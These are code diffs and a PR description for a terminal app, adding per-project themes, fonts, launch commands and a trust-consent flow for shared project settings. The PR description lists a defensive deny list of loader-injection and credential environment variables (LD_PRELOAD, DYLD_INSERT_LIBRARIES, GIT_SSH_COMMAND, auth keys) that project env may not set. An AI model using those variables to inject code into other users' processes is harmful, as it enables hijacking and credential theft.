@@ -355,3 +355,17 @@ const BY_ID = new Map(TERMINAL_THEMES.map((t) => [t.id, t]))
 export function resolveTerminalTheme(id: string | undefined): TerminalTheme {
   return (id ? BY_ID.get(id) : undefined) ?? BY_ID.get(DEFAULT_TERMINAL_THEME_ID)!
 }
+
+/**
+ * Whether an id names a theme this build actually ships.
+ *
+ * `resolveTerminalTheme` is total, which is exactly right for the GLOBAL setting (there is nothing
+ * behind it to fall back to) and exactly wrong for a per-project OVERRIDE: a project naming a theme
+ * this build does not have must fall back to whatever the user's own global setting says, not to the
+ * app default — silently repainting someone's terminals to `nodeterm-dark` because a teammate's
+ * `.nodeterm/settings.json` mentions a theme from a newer version is a worse answer than ignoring
+ * the override. So an override asks this FIRST and only then resolves.
+ */
+export function isKnownTerminalThemeId(id: string | undefined): boolean {
+  return id !== undefined && BY_ID.has(id)
+}

--- a/src/renderer/terminal/useXtermVisualSettings.test.tsx
+++ b/src/renderer/terminal/useXtermVisualSettings.test.tsx
@@ -202,23 +202,44 @@ describe('useXtermVisualSettings — project-scoped appearance', () => {
     expect(p.renders()).toBe(afterTheme)
   })
 
-  // The accepted cost of keeping the mirror in lockstep with the cache (see its doc comment): the
-  // panel's save path invalidates and immediately re-warms, so the project's terminals show this
-  // machine's global appearance for the length of one round trip. Asserted rather than left to be
-  // discovered — it is the visible half of the design decision.
-  it('falls back to global between an invalidate and the answer that follows it', async () => {
+  // `invalidate` runs after EVERY project-settings commit, of every family — a setup-script edit
+  // invalidates too. Dropping the mirrored appearance there would repaint the project's terminals
+  // to the global theme (and, with a project font, re-fit their grids into a possibly co-attached
+  // pty) on the way to re-reading the very document that hands the same value straight back — a
+  // flash on every committed field, seconds wide on an SSH project.
+  it('holds the project theme across an invalidate, so an unrelated save does not flash', async () => {
+    mockLaunchInfo({ p1: info({ theme: { value: 'dracula', source: 'shared' } }) })
+    const p = mount('p1')
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    const settled = p.renders()
+    // What a setup-script save does: invalidate, then re-warm.
+    act(() => invalidateProjectLaunchInfo('p1'))
+    expect(p.theme()).toBe('dracula')
+    expect(p.renders()).toBe(settled) // not even a re-render, let alone a repaint
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    expect(p.theme()).toBe('dracula')
+    expect(p.renders()).toBe(settled)
+  })
+
+  // Holding needs no expiry because the fresh read OVERWRITES unconditionally: this is the case
+  // that would otherwise strand a stale theme on screen — the override itself being deleted.
+  it('clears a held theme when the answer after an invalidate no longer sets one', async () => {
     mockLaunchInfo({ p1: info({ theme: { value: 'dracula', source: 'shared' } }) })
     const p = mount('p1')
     await act(async () => {
       await ensureProjectLaunchInfo('p1')
     })
     expect(p.theme()).toBe('dracula')
+    mockLaunchInfo({ p1: info({}) }) // the user removed the project's theme
     act(() => invalidateProjectLaunchInfo('p1'))
-    expect(p.theme()).toBe('nord')
     await act(async () => {
       await ensureProjectLaunchInfo('p1')
     })
-    expect(p.theme()).toBe('dracula')
+    expect(p.theme()).toBe('nord') // back to this machine's global setting, once and only once
   })
 
   it('keeps following the global setting for a project that overrides nothing', async () => {

--- a/src/renderer/terminal/useXtermVisualSettings.test.tsx
+++ b/src/renderer/terminal/useXtermVisualSettings.test.tsx
@@ -1,0 +1,252 @@
+// @vitest-environment jsdom
+//
+// Project-scoped terminal appearance, end to end through the hook: a project's `terminal.theme` /
+// `terminal.fontFamily` reaching the terminals of THAT project (and no other), live.
+//
+// The pure merge is covered in terminal-config.test.ts. What is proved here is the seam the merge
+// hangs off — the reactive mirror of the launch-info cache (`useProjectVisuals`) — and the two
+// properties that make it safe to put in front of a canvas full of live terminals:
+//  - a project's terminals re-render when ITS values change, and other projects' do not,
+//  - nothing re-renders when an UNRELATED part of the launch-info answer moves (a launch command, a
+//    trust verdict), which is why the mirror carries the appearance slice alone.
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import { act } from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import type { ProjectLaunchInfo, ResolvedProjectSettings } from '@shared/project-settings'
+import {
+  ensureProjectLaunchInfo,
+  invalidateProjectLaunchInfo,
+  resetProjectLaunchInfoForTests
+} from '../state/projectLaunchInfo'
+import { useSettings } from '../state/settings'
+import { useXtermVisualSettings } from './useXtermVisualSettings'
+import { xtermOptionsFromSettings } from './terminal-config'
+import { resolveTerminalTheme } from './themes'
+
+;(globalThis as { IS_REACT_ACT_ENVIRONMENT?: boolean }).IS_REACT_ACT_ENVIRONMENT = true
+
+const info = (
+  terminal: ResolvedProjectSettings['terminal'],
+  agents: ResolvedProjectSettings['agents'] = {}
+): ProjectLaunchInfo => ({
+  resolved: { setup: {}, worktree: {}, agents, terminal },
+  trusted: { agents: true, shell: true }
+})
+
+/** Stand in for the preload/bridge `projectSettings.launchInfo()` call — answers per project id. */
+function mockLaunchInfo(byProject: Record<string, ProjectLaunchInfo | null>): void {
+  ;(window as unknown as { nodeTerminal: unknown }).nodeTerminal = {
+    projectSettings: {
+      launchInfo: vi.fn((projectId: string) => Promise.resolve(byProject[projectId] ?? null))
+    }
+  }
+}
+
+interface Probe {
+  /** What the hook last answered. */
+  theme: () => string
+  font: () => string
+  /** How many times the component rendered — the re-render assertions live on this. */
+  renders: () => number
+  unmount: () => void
+}
+
+/** Mount one component that consumes the hook for `projectId`, recording every render. */
+function probe(projectId?: string): Probe {
+  let renders = 0
+  let last = { terminalTheme: '', fontFamily: '' }
+  function Probed(): null {
+    renders += 1
+    const v = useXtermVisualSettings(projectId)
+    last = { terminalTheme: v.terminalTheme, fontFamily: v.fontFamily }
+    return null
+  }
+  const host = document.createElement('div')
+  document.body.appendChild(host)
+  const root: Root = createRoot(host)
+  act(() => root.render(<Probed />))
+  return {
+    theme: () => last.terminalTheme,
+    font: () => last.fontFamily,
+    renders: () => renders,
+    unmount: () => {
+      act(() => root.unmount())
+      host.remove()
+    }
+  }
+}
+
+const GLOBAL = { terminalTheme: 'nord', fontFamily: 'Menlo' }
+let mounted: Probe[] = []
+
+beforeEach(() => {
+  resetProjectLaunchInfoForTests()
+  useSettings.setState((s) => ({ settings: { ...s.settings, ...GLOBAL } }))
+})
+
+afterEach(() => {
+  for (const p of mounted) p.unmount()
+  mounted = []
+})
+
+const mount = (projectId?: string): Probe => {
+  const p = probe(projectId)
+  mounted.push(p)
+  return p
+}
+
+describe('useXtermVisualSettings — project-scoped appearance', () => {
+  it('starts on the global settings and picks the project up when its info lands', async () => {
+    mockLaunchInfo({ p1: info({ theme: { value: 'dracula', source: 'shared' } }) })
+    const p = mount('p1')
+    expect(p.theme()).toBe('nord') // nothing fetched yet — the global setting, not a blank
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    // The whole point of doing this live: the terminal that is ALREADY on screen repaints — the
+    // hook re-rendered its consumer with the project's theme, which is what feeds applyLiveOptions.
+    expect(p.theme()).toBe('dracula')
+    expect(xtermOptionsFromSettings({ ...useSettings.getState().settings, terminalTheme: p.theme() })
+      .theme).toBe(resolveTerminalTheme('dracula').theme)
+  })
+
+  it("leaves another project's terminals on the global theme", async () => {
+    mockLaunchInfo({
+      p1: info({ theme: { value: 'dracula', source: 'shared' } }),
+      p2: info({})
+    })
+    const one = mount('p1')
+    const two = mount('p2')
+    await act(async () => {
+      await Promise.all([ensureProjectLaunchInfo('p1'), ensureProjectLaunchInfo('p2')])
+    })
+    expect(one.theme()).toBe('dracula')
+    expect(two.theme()).toBe('nord')
+  })
+
+  it('takes a LOCAL override the same as a shared one — appearance is not gated', async () => {
+    mockLaunchInfo({
+      p1: {
+        ...info({ theme: { value: 'tokyo-night', source: 'local' } }),
+        // Untrusted shared content: irrelevant here. `shell` is the gated field in this family;
+        // a colour cannot execute anything.
+        trusted: { agents: false, shell: false }
+      }
+    })
+    const p = mount('p1')
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    expect(p.theme()).toBe('tokyo-night')
+  })
+
+  it('falls back to the GLOBAL theme for an id this build does not know', async () => {
+    mockLaunchInfo({ p1: info({ theme: { value: 'from-a-newer-version', source: 'shared' } }) })
+    const p = mount('p1')
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    expect(p.theme()).toBe('nord')
+    expect(resolveTerminalTheme(p.theme()).id).toBe('nord')
+  })
+
+  it('overrides the font family, and only for that project', async () => {
+    mockLaunchInfo({
+      p1: info({ fontFamily: { value: 'Iosevka', source: 'shared' } }),
+      p2: info({})
+    })
+    const one = mount('p1')
+    const two = mount('p2')
+    await act(async () => {
+      await Promise.all([ensureProjectLaunchInfo('p1'), ensureProjectLaunchInfo('p2')])
+    })
+    expect(one.font()).toBe('Iosevka')
+    expect(one.theme()).toBe('nord') // untouched by a font-only override
+    expect(two.font()).toBe('Menlo')
+  })
+
+  it('gives a project-less terminal (the settings preview) the global settings', async () => {
+    mockLaunchInfo({ p1: info({ theme: { value: 'dracula', source: 'shared' } }) })
+    const p = mount(undefined)
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    expect(p.theme()).toBe('nord')
+    expect(p.font()).toBe('Menlo')
+  })
+
+  it('re-renders on nothing but the appearance slice of a launch-info answer', async () => {
+    mockLaunchInfo({ p1: info({ theme: { value: 'dracula', source: 'shared' } }) })
+    const p = mount('p1')
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    const afterTheme = p.renders()
+    // A second answer that changes only the launch command and the trust verdict — a terminal has
+    // no business repainting for either.
+    mockLaunchInfo({
+      p1: {
+        ...info(
+          { theme: { value: 'dracula', source: 'shared' } },
+          { launchCmd: { value: 'nix develop -c claude', source: 'shared' } }
+        ),
+        trusted: { agents: false, shell: false }
+      }
+    })
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    expect(p.theme()).toBe('dracula')
+    // NOT ONE extra render: the mirror mirrors the appearance slice alone, and re-answering the
+    // same two values must not touch the entry a canvas full of terminals is subscribed to.
+    expect(p.renders()).toBe(afterTheme)
+  })
+
+  // The accepted cost of keeping the mirror in lockstep with the cache (see its doc comment): the
+  // panel's save path invalidates and immediately re-warms, so the project's terminals show this
+  // machine's global appearance for the length of one round trip. Asserted rather than left to be
+  // discovered — it is the visible half of the design decision.
+  it('falls back to global between an invalidate and the answer that follows it', async () => {
+    mockLaunchInfo({ p1: info({ theme: { value: 'dracula', source: 'shared' } }) })
+    const p = mount('p1')
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    expect(p.theme()).toBe('dracula')
+    act(() => invalidateProjectLaunchInfo('p1'))
+    expect(p.theme()).toBe('nord')
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    expect(p.theme()).toBe('dracula')
+  })
+
+  it('keeps following the global setting for a project that overrides nothing', async () => {
+    mockLaunchInfo({ p1: info({}) })
+    const p = mount('p1')
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    act(() => {
+      // `setState`, not `update()`: the store's real setter also schedules a disk save through a
+      // preload this test does not stand up. What is under test is the SUBSCRIPTION.
+      useSettings.setState((s) => ({ settings: { ...s.settings, terminalTheme: 'gruvbox-dark' } }))
+    })
+    expect(p.theme()).toBe('gruvbox-dark')
+  })
+
+  it("lets the project's theme survive an unrelated global appearance edit", async () => {
+    mockLaunchInfo({ p1: info({ theme: { value: 'dracula', source: 'shared' } }) })
+    const p = mount('p1')
+    await act(async () => {
+      await ensureProjectLaunchInfo('p1')
+    })
+    act(() => {
+      useSettings.setState((s) => ({
+        settings: { ...s.settings, terminalTheme: 'one-dark', fontFamily: 'Fira Code' }
+      }))
+    })
+    expect(p.theme()).toBe('dracula') // the project still wins
+    expect(p.font()).toBe('Fira Code') // …and the un-overridden half follows the global edit
+  })
+})

--- a/src/renderer/terminal/useXtermVisualSettings.ts
+++ b/src/renderer/terminal/useXtermVisualSettings.ts
@@ -1,9 +1,11 @@
+import { useMemo } from 'react'
 import { useShallow } from 'zustand/react/shallow'
 import { useSettings } from '../state/settings'
-import { XTERM_VISUAL_KEYS, type XtermVisualSettings } from './terminal-config'
+import { useProjectVisuals } from '../state/projectLaunchInfo'
+import { mergeProjectVisuals, XTERM_VISUAL_KEYS, type XtermVisualSettings } from './terminal-config'
 
 /**
- * The appearance slice of Settings, as ONE subscription.
+ * The appearance slice of Settings for ONE project's terminals, as two subscriptions.
  *
  * Every component that owns an xterm needs the same thirteen fields, and the alternative — one
  * `useSettings((s) => s.settings.x)` per field — was already a wall of near-identical lines that
@@ -15,13 +17,39 @@ import { XTERM_VISUAL_KEYS, type XtermVisualSettings } from './terminal-config'
  * is the last thing that should re-render because a notification toggle moved. Shallow-comparing
  * the picked keys keeps the old behaviour — re-render only when an appearance value actually
  * changes — while collapsing the effect dependency to a single stable value.
+ *
+ * `projectId` layers that project's own `terminal.theme` / `terminal.fontFamily` over the global
+ * pick (see `mergeProjectVisuals`). Omit it for a terminal that belongs to no project — the
+ * settings-panel PREVIEW is the one such surface, and it must keep showing the GLOBAL settings
+ * being edited rather than whichever project happens to be active behind the panel.
+ *
+ * The project half subscribes to `useProjectVisuals`, NOT to the launch-info cache as a whole: that
+ * cache also carries launch commands, env and trust verdicts, and a terminal has no business
+ * re-rendering when one of those moves. Shallow again, and over the two values only.
+ *
+ * SPEC DEVIATION, deliberate (Task 5): the spec said a project's appearance applies "when a terminal
+ * is created", with existing terminals keeping theirs. There is no per-node appearance in this app —
+ * every terminal renders from the live settings and re-options itself through `applyLiveOptions` —
+ * so the honest implementation is live and project-scoped: changing a project's theme repaints that
+ * project's terminals, including ones already open, and leaves every other project's alone.
  */
-export function useXtermVisualSettings(): XtermVisualSettings {
-  return useSettings(
+export function useXtermVisualSettings(projectId?: string): XtermVisualSettings {
+  const base = useSettings(
     useShallow((s) => {
       const out = {} as Record<string, unknown>
       for (const k of XTERM_VISUAL_KEYS) out[k] = s.settings[k]
       return out as unknown as XtermVisualSettings
     })
   )
+  const overrides = useProjectVisuals(
+    useShallow((s) => {
+      const v = projectId ? s.byProject[projectId] : undefined
+      // Normalised (never the stored object, never `undefined`) so the shallow comparison has a
+      // stable shape to compare in every case — including a project whose entry is dropped.
+      return { theme: v?.theme, fontFamily: v?.fontFamily }
+    })
+  )
+  // Identity-stable while neither half changed: this value is the dependency the terminal
+  // components' live re-option effects hang off.
+  return useMemo(() => mergeProjectVisuals(base, overrides), [base, overrides])
 }

--- a/src/server/index.ts
+++ b/src/server/index.ts
@@ -33,8 +33,13 @@ import { DownloadTickets } from '../core/download-tickets'
 import { registerBoardLogHandlers, type BoardLogRoute } from '../core/board-log-handlers'
 import { ProjectTrustStore } from '../core/project-trust-store'
 import { ProjectSetupService } from '../core/project-setup-service'
-import { registerProjectSetupHandlers } from '../core/project-setup-handlers'
+import {
+  makeProjectTrustRequester,
+  registerProjectSetupHandlers,
+  type ProjectSetupHandlerDeps
+} from '../core/project-setup-handlers'
 import { registerProjectLaunchInfoHandlers } from '../core/project-launch-info-handlers'
+import { makeProjectSpawnOverrides } from '../core/project-spawn-overrides'
 import { makeLocalSetupRunner } from '../core/project-setup-runner-local'
 import { LogBuffer } from '../core/log-buffer'
 import { installLogSink } from '../core/log-sink'
@@ -284,13 +289,29 @@ export async function startServer(
     readSettings: (projectId) => workspaceStore.readProjectSettings(projectId),
     runLocal: makeLocalSetupRunner()
   })
-  registerProjectSetupHandlers(platform, projectSetupService, {
+  const projectSetupDeps: ProjectSetupHandlerDeps = {
     projectTargetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),
     worktreeList: (repoPath) => gitService.worktreeList(repoPath)
-  })
+  }
+  registerProjectSetupHandlers(platform, projectSetupService, projectSetupDeps)
   // `project-settings:launch-info` — same sibling registrar as main/index.ts, sharing this
   // process's own trust store.
   registerProjectLaunchInfoHandlers(platform, workspaceStore, projectTrustStore)
+  // Project env + shell at the spawn — the same core factory main/index.ts wires, over this
+  // shell's own stores. `requestTrust` is wired here too, and deliberately so: the Server Edition's
+  // consent prompt goes to `platform.broadcast` (the service's default `sendConsent`), which is the
+  // right delivery HERE — every attached client is an authenticated operator of this host — where
+  // on the desktop it would also reach relay peers. A headless server with nobody attached simply
+  // gets no answer, the prompt expires, and the shared value stays unused: fail closed on the
+  // grant, fail open on the spawn.
+  ptyManager.setProjectSpawnOverrides(
+    makeProjectSpawnOverrides({
+      readSettings: (projectId) => workspaceStore.readProjectSettings(projectId),
+      targetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),
+      trust: projectTrustStore,
+      requestTrust: makeProjectTrustRequester(projectSetupService, projectSetupDeps)
+    })
+  )
 
   const github = registerGitHubIntegration({
     platform,

--- a/src/server/index.ts
+++ b/src/server/index.ts
@@ -34,6 +34,7 @@ import { registerBoardLogHandlers, type BoardLogRoute } from '../core/board-log-
 import { ProjectTrustStore } from '../core/project-trust-store'
 import { ProjectSetupService } from '../core/project-setup-service'
 import { registerProjectSetupHandlers } from '../core/project-setup-handlers'
+import { registerProjectLaunchInfoHandlers } from '../core/project-launch-info-handlers'
 import { makeLocalSetupRunner } from '../core/project-setup-runner-local'
 import { LogBuffer } from '../core/log-buffer'
 import { installLogSink } from '../core/log-sink'
@@ -287,6 +288,9 @@ export async function startServer(
     projectTargetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),
     worktreeList: (repoPath) => gitService.worktreeList(repoPath)
   })
+  // `project-settings:launch-info` — same sibling registrar as main/index.ts, sharing this
+  // process's own trust store.
+  registerProjectLaunchInfoHandlers(platform, workspaceStore, projectTrustStore)
 
   const github = registerGitHubIntegration({
     platform,

--- a/src/shared/host-control.test.ts
+++ b/src/shared/host-control.test.ts
@@ -21,6 +21,13 @@ describe('isHostOnlyChannel', () => {
     expect(isHostOnlyChannel(IPC.projectSetupCancel)).toBe(true)
   })
 
+  it('covers request-trust too — it RAISES the host’s own consent prompt', () => {
+    // A guest that could cast this one would be able to put a dialog on the host's screen at will
+    // (prompt spam), and — paired with an admitted consent-submit — approve a shared launchCmd/env
+    // for the host's own agent launches. Same self-approval loop as run+consent-submit.
+    expect(isHostOnlyChannel(IPC.projectSetupRequestTrust)).toBe(true)
+  })
+
   it('leaves the read-only/lifecycle channels alone — the gate is on ACTION, not on the namespace', () => {
     // Subscribing and receiving events costs a guest nothing the canvas does not already show;
     // running host code, and answering the host's own trust prompt, are the two acts being gated.

--- a/src/shared/host-control.ts
+++ b/src/shared/host-control.ts
@@ -16,6 +16,10 @@ import { IPC } from './ipc'
  *    dialog. Either one alone is much weaker; the pair is a complete self-approval loop.
  *  - `project-setup:cancel` — the other side of the same run's control: a guest must not be able to
  *    kill the host's setup mid-write.
+ *  - `project-setup:request-trust` — RAISES the host's own consent dialog for a project's launch
+ *    settings. Alone it is prompt spam on someone else's screen; paired with an admitted
+ *    consent-submit it is the same self-approval loop as run+consent-submit, ending in a shared
+ *    `launchCmd`/`env` (or shell) approved for the host's own agent launches.
  *
  * DELIBERATELY NOT LISTED: `project-setup:subscribe`/`unsubscribe` and the `project-setup:event:*`
  * push. They neither start nor authorize anything, and a peer that can see the canvas can already
@@ -30,7 +34,8 @@ export const HOST_ONLY_CHANNEL_PREFIXES: readonly string[] = ['githubControl:']
 export const HOST_ONLY_CHANNELS: ReadonlySet<string> = new Set([
   IPC.projectSetupRun,
   IPC.projectSetupCancel,
-  IPC.projectSetupConsentSubmit
+  IPC.projectSetupConsentSubmit,
+  IPC.projectSetupRequestTrust
 ])
 
 /** What a refused peer is told. One wording, so the two shells answer identically. */

--- a/src/shared/ipc.ts
+++ b/src/shared/ipc.ts
@@ -246,8 +246,9 @@ export const IPC = {
    *  unknown project id, same as projectSettingsRead. */
   projectSettingsLaunchInfo: 'project-settings:launch-info',
   /** main→renderer broadcast: `{projectId}` after ANY family approval changes for that project (a
-   *  consent dialog answered, a trust record revoked). Nobody emits this yet (Task 2 records
-   *  approvals) — the channel exists so the renderer cache can subscribe ahead of the emitter. */
+   *  consent dialog answered, a trust record revoked). Emitted by
+   *  `ProjectSetupService.ensureFamilyTrusted` on an approval — for EVERY project that asked, not
+   *  just the one that raised the prompt (two canvas nodes can share one location). */
   projectTrustChanged: 'project-trust:changed',
   /** Run a project's setup/archive script. Args: (projectId, kind, worktreePath?) — NO rootPath/
    *  projectName/ssh: the handler derives those itself from its own workspace index by projectId,
@@ -256,10 +257,18 @@ export const IPC = {
    *  projectSetupEvent. */
   projectSetupRun: 'project-setup:run',
   projectSetupCancel: 'project-setup:cancel',
+  /** Ask for one project's `agents`/`shell` family to be trusted, prompting if it is not. Args:
+   *  `(projectId, family)` — nothing path-shaped: the handler derives the location from its own
+   *  workspace index, same as projectSetupRun. Answers `true` only when the family is trusted at
+   *  that location (nothing shared to gate, an existing grant, or a fresh approval); `false` covers
+   *  skip, expiry and every failure. HOST-ONLY (`shared/host-control.ts`): it raises the host's own
+   *  dialog. `setup` is deliberately NOT accepted here — that family is gated by the runner. */
+  projectSetupRequestTrust: 'project-setup:request-trust',
   /** Renderer's answer to a projectSetupConsentRequest ('approve' | 'skip'). A stale/unknown
    *  requestId is a silent no-op — an expired prompt can never be approved late. */
   projectSetupConsentSubmit: 'project-setup:consent-submit',
-  /** main→renderer: raise the trust dialog (payload: ProjectSetupConsentRequest). */
+  /** main→renderer: raise the trust dialog (payload: ProjectConsentRequest — tagged by family, the
+   *  `setup` arm being the script-runner's own request). */
   projectSetupConsentRequest: 'project-setup:consent-request',
   /** main→renderer: close a prompt nobody answered (payload: { requestId }). */
   projectSetupConsentDismiss: 'project-setup:consent-dismiss',

--- a/src/shared/ipc.ts
+++ b/src/shared/ipc.ts
@@ -241,6 +241,14 @@ export const IPC = {
   projectSettingsRead: 'project-settings:read',
   projectSettingsWriteShared: 'project-settings:write-shared',
   projectSettingsUpdateLocal: 'project-settings:update-local',
+  /** Resolved settings + per-family trust verdict for one project (`ProjectLaunchInfo`), the single
+   *  read a launcher warms before it may consume a shared-sourced value — answers `null` for an
+   *  unknown project id, same as projectSettingsRead. */
+  projectSettingsLaunchInfo: 'project-settings:launch-info',
+  /** main→renderer broadcast: `{projectId}` after ANY family approval changes for that project (a
+   *  consent dialog answered, a trust record revoked). Nobody emits this yet (Task 2 records
+   *  approvals) — the channel exists so the renderer cache can subscribe ahead of the emitter. */
+  projectTrustChanged: 'project-trust:changed',
   /** Run a project's setup/archive script. Args: (projectId, kind, worktreePath?) — NO rootPath/
    *  projectName/ssh: the handler derives those itself from its own workspace index by projectId,
    *  never the caller (project-setup-handlers.ts). Answers a ProjectSetupRunResult — `started` only

--- a/src/shared/project-settings.ts
+++ b/src/shared/project-settings.ts
@@ -337,6 +337,21 @@ export function resolveProjectSettings(
 
 export type ProjectTrustFamily = 'setup' | 'agents' | 'shell'
 
+/**
+ * One project's fully-resolved settings PLUS the trust verdict a launcher needs before consuming
+ * any shared-sourced executable value out of `resolved` — the `project-settings:launch-info` IPC
+ * answer (Task 1, consumption plan). `trusted.<family>` is `true` when the family's SHARED document
+ * has no executable content at all (`projectTrustContent` returns `null` — nothing to gate), and
+ * otherwise the trust-store verdict for that family's shared-content hash. It does NOT depend on
+ * whether `resolved` actually picked the shared value for a given key (a local override still
+ * reports the shared family's own verdict) — a caller that only ever consumes a shared-sourced
+ * value already knows to check `resolved.<family>.<key>.source === 'shared'` first.
+ */
+export interface ProjectLaunchInfo {
+  resolved: ResolvedProjectSettings
+  trusted: { agents: boolean; shell: boolean }
+}
+
 /** Which of the setup family's two scripts a run executes. */
 export type ProjectSetupKind = 'setup' | 'archive'
 

--- a/src/shared/project-settings.ts
+++ b/src/shared/project-settings.ts
@@ -373,6 +373,51 @@ export interface ProjectSetupConsentRequest {
   previouslyApproved: boolean
 }
 
+/**
+ * main→renderer: the consent prompt for a family nothing in the setup service EXECUTES — the launch
+ * settings a caller is about to consume. Same one-answer machinery, same trichotomy, same host-only
+ * delivery as the setup request; what differs is the content the dialog must put on screen, because
+ * that content is what the one approval covers (`projectTrustContent('agents', …)` hashes launchCmd
+ * AND every env pair, so BOTH are in the payload — showing one half would approve the other unseen).
+ *
+ * Straight from the SHARED document, like `scripts` above: a local override must never be able to
+ * launder a shared value past the dialog by making it look like the user's own typing.
+ */
+export interface ProjectAgentsConsentRequest {
+  family: 'agents'
+  requestId: string
+  projectName: string
+  locationLabel: string
+  previouslyApproved: boolean
+  /** Absent when the shared doc sets no launch command (an env-only family is still gated). */
+  launchCmd?: string
+  /** Absent when the shared doc sets no env. Values are the approved bytes — rendered verbatim. */
+  env?: Record<string, string>
+}
+
+/** main→renderer: the consent prompt for the terminal program a shared document names. The whole
+ *  family's executable content is this one string (`projectTrustContent('shell', …)`). */
+export interface ProjectShellConsentRequest {
+  family: 'shell'
+  requestId: string
+  projectName: string
+  locationLabel: string
+  previouslyApproved: boolean
+  shell: string
+}
+
+/**
+ * Everything that can arrive on `IPC.projectSetupConsentRequest`, TAGGED by trust family: one
+ * channel, one queue, one dialog — the tag says which variant's content to render. The `setup` arm
+ * is the original payload with the tag added; a renderer that switches on `family` must treat a tag
+ * it does not know as unrenderable (never as "some other variant"), because approving a prompt
+ * whose content was not on screen is exactly what this dialog exists to prevent.
+ */
+export type ProjectConsentRequest =
+  | ({ family: 'setup' } & ProjectSetupConsentRequest)
+  | ProjectAgentsConsentRequest
+  | ProjectShellConsentRequest
+
 export type ProjectSetupConsentAnswer = 'approve' | 'skip'
 
 export type ProjectSetupRunResult =

--- a/src/shared/types.ts
+++ b/src/shared/types.ts
@@ -801,8 +801,19 @@ export interface ProjectSetupApi {
   cancel(runKey: string): Promise<boolean>
   /** Renderer's answer to a `onConsentRequest` prompt. A stale/unknown requestId is a silent no-op. */
   consent(requestId: string, answer: import('./project-settings').ProjectSetupConsentAnswer): Promise<void>
-  /** main → renderer: raise the trust dialog before a shared-sourced script runs. */
-  onConsentRequest(cb: (req: import('./project-settings').ProjectSetupConsentRequest) => void): () => void
+  /**
+   * Ask for this project's `agents`/`shell` family to be trusted, prompting the human if it is not
+   * yet — the call a launcher makes before consuming a shared-sourced `launchCmd`/`env`/`shell`.
+   * `true` only when the family is trusted at that project's location (nothing shared to gate, an
+   * existing grant, or a fresh approval); skip, expiry, an unknown project and a refused (relay
+   * guest) call are all `false`. Concurrent asks for one location share ONE dialog. On approval,
+   * `projectSettings.onTrustChanged` fires for the project, so a cached launch-info verdict is
+   * re-read rather than trusted from before the answer.
+   */
+  requestTrust(projectId: string, family: 'agents' | 'shell'): Promise<boolean>
+  /** main → renderer: raise the trust dialog before a shared-sourced script runs, or before a
+   *  shared-sourced launch setting is consumed — tagged by family (`ProjectConsentRequest`). */
+  onConsentRequest(cb: (req: import('./project-settings').ProjectConsentRequest) => void): () => void
   /** main → renderer: close a prompt nobody answered before the renderer did. */
   onConsentDismiss(cb: (p: { requestId: string }) => void): () => void
   /** Per-project run progress (`ProjectSetupEvent`), mirroring `boardLog.onChanged`'s ref-counted

--- a/src/shared/types.ts
+++ b/src/shared/types.ts
@@ -776,6 +776,13 @@ export interface ProjectSettingsApi {
     projectId: string,
     local: import('./project-settings').ProjectLocalSettings | undefined
   ): Promise<boolean>
+  /** Resolved settings + per-family trust verdict for one project — `null` for an unknown id. The
+   *  renderer cache (`renderer/state/projectLaunchInfo.ts`) warms this on activate and never awaits
+   *  it inline; a caller wanting the raw handshake calls this directly instead. */
+  launchInfo(projectId: string): Promise<import('./project-settings').ProjectLaunchInfo | null>
+  /** main → renderer: a family's trust verdict changed for `projectId` (a consent dialog answered,
+   *  an approval revoked). Nobody broadcasts this yet — Task 2 records approvals and emits it. */
+  onTrustChanged(cb: (p: { projectId: string }) => void): () => void
 }
 
 export interface ProjectSetupApi {


### PR DESCRIPTION
## Summary

PR4 of the Project Settings series — **stacked on #323** (trust/setup), which stacks on #317 → #315. This is what makes the panel's promises real: the per-project agent and terminal families now actually take effect at launch and spawn.

- **Launch-info snapshot** — a `project-settings:launch-info` IPC returns the resolved settings **plus per-family trust verdicts**, warmed into a module-level renderer cache (permissionMode.ts pattern: sync `now()` fails open to today's behavior, `ensure()` is memoized/bounded/never-rejects and **re-fetches after a timeout** rather than sticking cold on a dropped WS-RPC).
- **Family-generic consent** — `ensureFamilyTrusted(target, 'agents'|'shell')` on the same app-wide queue as setup (extracted, not forked — the setup flow is byte-behavior unchanged), a tagged consent-payload union, agents/shell dialog variants (launchCmd + env table / bare shell, bidi-pinned verbatim), a host-only `project-setup:request-trust` channel, and a `project-trust:changed` broadcast that re-warms every consumer on approval.
- **The consumption rule, everywhere:** an untrusted shared executable value is **never used and never blocks** — the site falls through to the next layer and fires a non-blocking trust prompt; after approval, subsequent launches pick it up.
- **Agent launch** — per-project `launchCmd` at every launch/resume/restart/wake site (threaded through the one documented read site), scoped strictly to the project's **own** default agent (a shared doc that sets only `launchCmd` can never retarget the user's global default → no cross-agent misfire); `defaultAgentId` seeds new nodes (validated builtin/custom/enabled, ungated by design). A project `launchCmd` containing `${env:…}` is refused (literal-only, matching project env).
- **Spawn env + shell** — a core `makeProjectSpawnOverrides` factory (one implementation, both shells) merges trusted project env and shell at the pty spawn (local + SSH staged-0600-file legs, values never on argv), gated by the **same** hash rule as launch-info so the two sides cannot disagree. A **reserved-key filter** protects the layers a consent table can't fairly represent: `NODETERM_*`, `NODE_OPTIONS`, the loader/interpreter-injection family (`LD_PRELOAD`/`DYLD_INSERT_LIBRARIES`/`LD_AUDIT`/`LD_LIBRARY_PATH`/`DYLD_LIBRARY_PATH`/`GIT_SSH_COMMAND`/`GIT_EXTERNAL_DIFF`/`BASH_ENV`/`ENV`), the agent config dirs (`CLAUDE_CONFIG_DIR`/`CODEX_HOME`/`XDG_CONFIG_HOME`), the auth-strip set, and the model-gateway keys. `PATH` stays allowed (coherent consent; a hijack needs a visible committed binary).
